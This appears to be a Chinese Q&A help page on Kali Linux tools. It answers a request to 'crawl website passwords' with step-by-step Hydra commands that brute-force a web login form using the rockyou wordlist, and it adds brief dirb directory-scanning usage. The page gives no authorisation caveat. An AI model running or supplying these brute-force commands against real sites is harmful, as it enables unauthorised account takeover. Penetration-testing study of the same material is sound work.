kali dirb爬取网站密码
时间: 2023-06-13 14:03:42 浏览: 128
Kali Linux 中的 Dirb 工具可以用来爬取网站的目录和文件,但是不能直接用来爬取密码。如果你想要爬取网站的密码,可以使用 Hydra 工具。以下是使用 Hydra 爆破网站密码的一些步骤:
1. 打开终端,输入以下命令安装 Hydra:
```
sudo apt-get install hydra
```
2. 确定要爆破的网站和登录页面。
3. 确定要爆破的用户名和密码字典文件。可以使用 Kali Linux 中自带的字典文件 /usr/share/wordlists 目录下的字典文件。
4. 输入以下命令,使用 Hydra 开始爆破:
```
hydra -l [用户名] -P [密码字典文件] [目标网站] http-post-form "[登录页面]:username=^USER^&password=^PASS^&submit=Login:Invalid username or password"
```
例如:
```
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid username or password"
```
5. 等待 Hydra 爆破完成,如果成功,会返回正确的用户名和密码。
相关问题
kali dirb学习
Kali是一个基于Debian的渗透测试平台,其中集成了许多常见和不常见的渗透测试工具。其中一个工具是dirb,它是一款WEB目录扫描工具,也被集成在Kali渗透测试系统中。dirb的用法非常简单,你可以通过在终端中输入dirb命令并指定目标URL来运行它。dirb将会扫描指定URL的目录并显示存在的目录和文件。
kali dirb使用教程
kali dirb是一款用于扫描网站目录的工具。您可以使用以下步骤来使用kali dirb:
1. 打开终端并输入以下命令安装kali dirb:
```
sudo apt-get install dirb
```
2. 在终端中输入以下命令来运行kali dirb:
```
dirb <URL>
```
其中,`<URL>`是您要扫描的目标网站的URL。
3. 扫描完成后,kali dirb会显示扫描结果,包括找到的目录和文件。
阅读全文